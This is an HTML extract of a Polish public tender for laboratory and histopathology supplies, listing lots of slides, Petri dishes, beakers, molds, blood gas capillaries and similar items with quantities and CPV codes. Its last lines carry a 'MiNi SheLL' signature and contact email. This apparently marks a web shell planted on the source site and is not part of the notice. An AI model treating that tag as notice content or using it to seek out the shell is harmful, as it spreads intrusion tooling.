<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> PAKIET 11 - PUDEŁKA.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	PUDEŁKA KARTONOWE Z PRZEGRÓDKAMI I WIECZKIEM DO PRZECHOWYWANIA PREPARATÓW O WYM. 16 X 21 NA 100 SZT. SZKIEŁEK	szt	50
2	PUDEŁKO  PP NA PREPARATY MIKR. ( NA 50 PREP MIKROBIOLOGICZNYCH)	szt	4
3	PUDEŁKO Z WIECZKIEM DO PROBÓWEK CRIOVIAL NA 81 MIEJSC 	szt	1
4	PUDEŁKA PLASTIKOWE LUB DREWIANE DO PRZECHOWYWANIA PREPARATÓW HIST-PATOL. (NA 100 SZKIEŁEK)	Szt.	150.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.70.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> PAKIET 12 - SZALKI PETRIEGO.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	SZALKI PETR. FI 60 MM ASEPTYCZNE	szt	3 000
2	SZALKI PETR. FI 60MM JAŁOWA JEDNOKOM.	szt	1 200
3	SZALKI PETR.FI 90MM ASEPT.	op	1
4	SZALKI PETRIEGO 90X16MM Z ZEBRAMI ASEPTYCZNE	szt	3 000.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.70.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> PAKIET 13  - SZKIEŁKA.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	SZKIEŁKA PODSTAWOWE 1 MAT DWUSTRONNY 76X26 /A 50 /	op	17 587
2	SZKIEŁKA PODSTAWOWE Z ŁEZKĄ		50
3	SZKIEŁKO NAKRYWKOWE 24X24	szt	24 000
4	SZKIEŁKO NAKRYWKOWE 24X32	szt	3 000
5	SZKIEŁKO NAKRYWKOWE 24X40	szt	25 000
6	SZKIEŁKO NAKRYWKOWE 24X50	szt	9 100.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.79.00.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> PAKIET 14-ZLEWKI.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	ZLEWKA LAB.NISKA V-25 ML.,szklana	szt	30
2	ZLEWKA LAB. NISKA V 50 ML,szklana	szt	20
3	ZLEWKA LABOR.NISKA 100ML,szklana	szt	20
4	ZLEWKA LABOR.NISKA  V-1000 ML,szklana	szt	10
5	ZLEWKA LABORATOR.NISKA  V-2000 ML,szklana	szt	10
6	ZLEWKA LABOR.WYSOKA V-50 ML,szklana	szt	20
7	ZLEWKA LABOR.WYSOKA  V-100 ML,szklana	szt	20.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.79.00.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> PAKIET 15  -POJEMNIKI.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	POJEMNIKI PLASTIKOWE DO TRANSPORTU PŁYTEK Z ROZMAZEM SZPIKU O WYM. 30 X 30 X 5	szt	3
2	POJEMNIK DO HODOWLI BAKTERII W WARUNKACH BEZTLENOWYCH -POJ. 7,5 L 	szt	1.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.70.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> PAKIET 16 - FOREMKI.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	FOREMKA DO ZATAPIANIA WYCINKÓW HISTOPATOLOGICZNYCH 15X15X6 MM,metalowa	szt	50
2	FOREMKA DO ZATAPIANIA WYCINKÓW HISTOPATOLOGICZNYCH 24X24X6MM,metalowa	szt	30
3	FOREMKA DO ZATAPIANIA WYCINKÓW HISTOPATOLOGICZNYCH 30X24X6MM,metalowa	szt	50
4	FOREMKA DO ZATAPIANIA WYCINKÓW HISTOPATOLOGICZNYCH 37X24X5MM,metalowa	szt	30
5	FOREMKA DO ZATAPIANIA WYCINKÓW HISTOPATOLOGICZNYCHZAT 33X24X12MM,metalowa	szt	100.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.70.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 26 <b>NAZWA:</b> PAKIET 17 - SZCZOTKI.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Szczotka do mycia probówek śr.0,8	szt	10
2	Szczotka do mycia probówek śr. 1,2	szt	20
3	Szczotka do mycia probówek śr. 2,0	szt	20
4	Szczotka do mycia probówek śr. 2,5	szt	20
5	SZCZOTKA DO PROB.Z PĘDZ.FI 9	szt	44
6	SZCZOTKA LABORAT. Z PĘDZELKIEM 12MM	szt	40
7	SZCZOTKA LABORAT. W PĘDZELKIEM 20MM	szt	70
8	SZCZOTKA LABORAT. Z PĘDZELKIEM 25MM	szt	70.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.70.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 27 <b>NAZWA:</b> PAKIET 18 -RÓŻNE - NA POZYCJE.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	PŁYTA PLAST.DO OZNACZEŃ GRUP KRWI-1OP+100SZT	op	30.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.70.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 28 <b>NAZWA:</b> PAKIET 18 -RÓŻNE - NA POZYCJE.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2	PISAK DO SZKŁA LAB.-WODOODPORNY, CIENKOPISZĄCY,niebieski	szt	66.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.70.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 29 <b>NAZWA:</b> PAKIET 18- RÓŻNE - NA POZYCJE.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3	PISAK DO SZKŁA LAB.- WODOODPORNY, STANDARDOWY,czarny	szt	150.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.70.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 30 <b>NAZWA:</b> PAKIET 18 - RÓŻNE - NA POZYCJE.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 4	Marker hispatologiczny czarny odporny na działanie takich  rozpuszczalników jak ksylen, aceton i formalina	szt	6.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.70.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 31 <b>NAZWA:</b> PAKIET 18-RÓŻNE- NA POZYCJE.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 5	NOŻYKI DO TESTÓW ALERGICZNYCH STER. HH	szt	2 480.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.70.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 32 <b>NAZWA:</b> PAKIET 18 - RÓŻNE -NA POZYCJE.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 6	OPASKA UCISKOWA DO POBIERANIA KRWI - STAZA -odporna na działanie środków dezynfekcyjnych i sterylizację ,wielokrotnego użytku	szt	229.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.70.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 33 <b>NAZWA:</b> PAKIET 18- RÓŻNE - NA POZYCJE.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 7	SZPATUŁKA LARYNGOLOGICZNA DREWNIANA NIESTERYLNA (pak. po 100 szt.)	szt	21 300.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.70.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 34 <b>NAZWA:</b> PAKIET 18-RÓŻNE - NA POZYCJE.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 8	Kasetki do zatapiania w parafinie bez wieczek (standard) kolor biały,plastikowe	szt	17 000.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.70.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 35 <b>NAZWA:</b> PAKIET 18-RÓZNE- NA POZYCJE.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 9	Wieczko metalowe do kasetek	szt	400.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.70.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 36 <b>NAZWA:</b> PAKIET18-RÓŻNE- NA POZYCJE.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 10	Nożyczki jednorazowe do mikrotonu typu 8/9 niskoprofilowane - 35/80 mm	Op   	7.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.70.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 37 <b>NAZWA:</b> PAKIET 18- RÓŻNE- NA POZYCJE.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 11	Pojemnik do maszyny do barwienia do maszyny typu MICROM HMS 70  o wymiarach 5 cmx24cmx10cm	szt	20.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.70.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 38 <b>NAZWA:</b> PAKIET 18- RÓŻNE - NA POZYCJE.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 12	Żyletki mikrotomowe C-35, przeznaczone do skrawania w kriostacie, długość ostrza 80 mm	szt	40.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.70.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 39 <b>NAZWA:</b> PAKIET 18- RÓŻNE- NA POZYCJE.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 13	Uchwyt do żyletek do kriostatu, o długości 130 mm, ze  stali nierdzewnej, typ 130 C	szt	1.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.70.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 40 <b>NAZWA:</b> PAKIET 18-RÓŻNE-NA POZYCJE.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 14	Klej montażowy do szkiełek, szybkoschnący, z możliwością użycia w nakrywkach automatycznych, o poj.125 ml	szt	3.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.70.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 41 <b>NAZWA:</b> PAKIET 18-RÓŻNE- NA POZYCJE.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 15	MOŹDZIEŻ DO ROZGNIATANIA LEKÓW,ceramiczny	szt	2.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.79.00.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 42 <b>NAZWA:</b> PAKIET 18- RÓŻNE- NA POZYCJE.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 16	KAPILARY DO GAZOMETRII, heparyna litowa ,vol min. 175ul	szt	27 370.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.70.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 43 <b>NAZWA:</b> PAKIET 18- RÓŻNE- NA POZYCJE.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 17	ZATYCZKA DO KAPILAR GAZOMETR.	szt	16 440.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.70.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 44 <b>NAZWA:</b> PAKIET18- RÓŻNE- NA POZYCJE.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 18	MIESZADEŁKO DO KAPILAR GAZOMETR.	szt	2 100.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.70.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 45 <b>NAZWA:</b> PAKIET 18-RÓŻNE- NA POZYCJE.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 19	WYMAZÓWKI Z DREWNA Z WACIKIEM O ŚR 5MM, niesterylne	szt	2 000.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.70.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 46 <b>NAZWA:</b> PAKIET 18-RÓŻNE - NA POZYCJE.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 20	PATYCZKI DO WYMAZÓW (100SZT)	op	222.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.70.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 47 <b>NAZWA:</b> PAKIET 18-ROŻNE- NA POZYCJE.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 21	KOSZYCZKI METALOWE DO AUTOKLAWOWANIA PROBÓWEK, SZEŚCIENNE,90X90X90XMM	szt	6.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.70.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 48 <b>NAZWA:</b> PAKIET18-RÓŻNE- NA POZYCJE.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 22	BIBUŁA FILTRACYJNA JAKOŚĆ ŚREDNIA 45 X 56 X 100	szt	10.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.70.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 49 <b>NAZWA:</b> PAKIET18-RÓŻNE- NA POZYCJE.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> *23	Vortex do homogenizacji zawiesin w probówkach o średnicy 16 mm	szt	1
*ad.poz.23- wymagania:-prędkość rotacyjna:50-3000 obrotów/minutę; czas przyspieszenia:3s;                -tryb pracy:ciągły, tymczasowy          ;-płynna regulacjaprędkościrotacyjnej  -ilośćwsadu- 2 probówki.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.70.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com